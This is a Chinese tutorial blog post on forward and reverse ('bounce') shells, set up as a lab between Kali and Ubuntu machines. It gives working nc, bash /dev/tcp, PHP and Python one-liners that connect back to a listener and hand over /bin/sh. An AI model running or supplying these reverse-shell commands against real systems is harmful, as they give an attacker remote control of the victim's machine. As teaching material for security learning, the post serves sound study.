百度360必应搜狗淘宝本站头条
当前位置:网站首页 > IT知识 > 正文

3分钟搞懂反弹shell

liuian 2024-12-02 22:29 24 浏览

实际上,很早很早以前就听说过反弹shell,我最早做的网络安全实验就开始反弹shell。比如这个知乎live中的第三个实验TCP会话劫持,就反弹了shell。一年前在与攻防团队的交流会上,再次听到反弹shell,当时也没放在心上,反正挺重要的。直到今天,才算彻底明白反弹shell是咋回事。如果用一句话概述,那么反弹shell就是:

黑客控制了目标,弹一个shell,构建一个稳定的通信后门。


【网络安全】TCP-IP协议攻击 作者 ailx10


  • 先弹shell就是正向shell,后连接
  • 后弹shell就是反向shell,先监听

正向shell:客户端想要获得服务端的shell

  • 假设小黑是一名黑客
  • 他悄咪咪溜进了知乎总部大楼,发现一台刘看山的电脑,但是刘看山出门了
  • 于是小黑通过nc将这台电脑的控制权通过23333端口发射出去
  • 小黑做了一系列的操作,又悄咪咪的原路返航
  • 回到家后,通过nc连上刘看山的电脑
  • 后来,刘看山的隐私泄露了~
  • (这里小黑是客户端,刘看山是服务端,服务端发射shell)

反向shell:服务端想要获得客户端的shell(也就是反弹shell)

  • 假设小黑是一名黑客
  • 他悄咪咪溜进了知乎总部大楼,发现一台刘看山的电脑,但是刘看山出门了
  • 小黑发现电脑里有一个有趣的文件(刘看山的秘密)
  • 小黑下载这个文件到自己的U盘里,又悄咪咪的原路返航
  • 回到家后,小黑打开这个文件
  • 发现电脑被刘看山控制了~
  • (这里小黑是客户端,刘看山是服务端,客户端发射shell)

正向shell(服务端送shell)

  • 第一步:在kali rolling(服务端)上监听23333端口,并反弹shell
nc -lvp 23333 -e /bin/sh
  • 第二步:在ubuntu18(客户端)上连接kali rolling的23333端口
  • 这个时候,客户端就拿到服务端的shell控制权了
  • 可以随意控制服务端
nc 192.168.160.140 23333

反向shell(客户端送shell)

  • 第一步:在ubuntu18上选择增强版的netcat
  • 一般ubuntu默认的是free-bsd版本的nc
update-alternatives --config nc
  • 第二步:在kali rolling上启动服务端,等待客户端上钩
  • 客户端只要吃钩子,服务端就获得了客户端的shell控制权
  • 可以随意控制客户端
nc -lvp 23333
  • 第三步:在ubuntu18上启动客户端,吃钩子
nc 192.168.160.140 23333 -e /bin/sh
  • 我们发现必须客户端和服务端都安装了nc才能实现反弹shell(反向shell)
  • 但是如果其中一方没有安装nc怎么办?

bash反弹shell

  • 服务端(kali rolling上监听23333)
  • 客户端吃钩子,服务端就成功控制客户端了
  • 客户端(ubuntu18上bash反弹shell)
bash -i >& /dev/tcp/192.168.160.140/23333 0>&1

php反弹shell

  • 服务端(kali rolling上监听23333)
  • 客户端吃钩子,服务端就成功控制客户端了
  • 客户端(ubuntu18上bash反弹shell)
php -r '$f=fsockopen("192.168.160.140",23333);exec("/bin/sh -i <&3 >&3 2>&3");'

python反弹shell

  • 服务端(kali rolling上监听23333)
  • 客户端吃钩子,服务端就成功控制客户端了
  • 客户端(ubuntu18上bash反弹shell)
python -c 'import socket,subprocess,os; \
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.160.140",23333));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

本篇完~

相关推荐

使用Assembly打包和部署Spring Boot工程

SpringBoot项目的2种部署方式目前来说,SpringBoot项目有如下2种常见的部署方式一种是使用docker容器去部署。将SpringBoot的应用构建成一个docke...

java高级用法之:调用本地方法的利器JNA

简介JAVA是可以调用本地方法的,官方提供的调用方式叫做JNI,全称叫做javanativeinterface。要想使用JNI,我们需要在JAVA代码中定义native方法,然后通过javah命令...

Linux中如何通过Shell脚本来控制Spring Boot的Jar包启停服务?

SpringBoot项目在为开发者带来方便的同时,也带来了一个新的问题就是Jar包如何启动?在一般情况下我们都是采用了最为经典的java-jar命令来进行启动。然后通过ps命令找到对应的应用线程通...

牛逼!自己手写一个热加载(人民币手写符号一个横还是两个横)

热加载:在不停止程序运行的情况下,对类(对象)的动态替换JavaClassLoader简述Java中的类从被加载到内存中到卸载出内存为止,一共经历了七个阶段:加载、验证、准备、解析、初始化、使用、...

java 错误: 找不到或无法加载主类?看看怎么解决吧!

问题扫述:项目名称调整,由原来的com.mp.qms.report.biz调整为com.mp.busicen.mec.qms.report.biz后。项目在IDEA直接运行,但打包部署到服务器...

如何将 Spring Boot 工程打包成独立的可执行 JAR 包

导语:通过将SpringBoot项目打包成独立的可执行JAR包,可以方便地在任何支持Java环境的机器上运行项目。本文将详细介绍如何通过Maven构建插件将SpringBoot...

class 增量发包改造为 jar 包方式发布

大纲class增量发包介绍项目目录结构介绍jar包方式发布落地方案class增量发包介绍当前项目的迭代修复都是通过class增量包来发版本的将改动的代码class增量打包,如下图cla...

Jar启动和IDE里启动Sprintboot的区别

想聊明白这个问题,需要补充一些前提条件,比如Fatjar、类加载机制等1、Fatjar我们在开发业务程序的时候,经常需要引用第三方的jar包,最终程序开发完成之后,通过打包程序,会把自己的代码和三...

Java 20年,以后将往哪儿走?(java还能流行多久)

在今年的Java20周年的庆祝大会中,JavaOne2015的中心议题是“Java的20年”。甲骨文公司Java平台软件开发部的副总裁GeorgesSaab的主题演讲就将关注点放在了java...

Spring Boot Jar 包秒变 Docker 镜像实现多环境部署

你是否在互联网大厂后端开发工作中,遇到过这样的困扰?当完成一个SpringBoot项目开发,准备将Jar包部署到不同环境时,却发现各个环境依赖不同、配置复杂,部署过程繁琐又容易出错,不仅耗费...

从0开始,让你的Spring Boot项目跑在Linux服务器

1搭建Linux服务器1.1购买阿里云服务器或安装虚拟机这里建议是CentOS7.X或CentOS8.X,当然其他的Linux如deepin、Ubuntu也可以,只是软件环境的安装包和安装方式...

【技术】Maven 上传第三方jar包到私服

通过nexus后台上传私服以NexusRepositoryManagerOSS2.14.5-02为例。登录nexus后台。定义Maven坐标Maven坐标有两种方式:1.自定义参数;2....

JVM参数、main方法的args参数使用

一、前言我们知道JVM参数分为自定义参数、JVM系统参数,Javamain方法的参数。今天就谈谈怎么使用吧。二、查看jvm参数定义自定义参数我们打开cmd窗口,输入java,就能看到自定义参数的格式...

Maven项目如何发布jar包到Nexus私服

Maven项目发布jar包到Nexus私服在编码过程中,有些通用的代码模块,有时候我们不想通过复制粘贴来粗暴地复用。因为这样不仅体现不了变化,也不利于统一管理。这里我们使用mavendeploy的方...

干货丨Hadoop安装步骤!详解各目录内容及作用

Hadoop是Apache基金会面向全球开源的产品之一,任何用户都可以从ApacheHadoop官网下载使用。今天,播妞将以编写时较为稳定的Hadoop2.7.4版本为例,详细讲解Hadoop的安...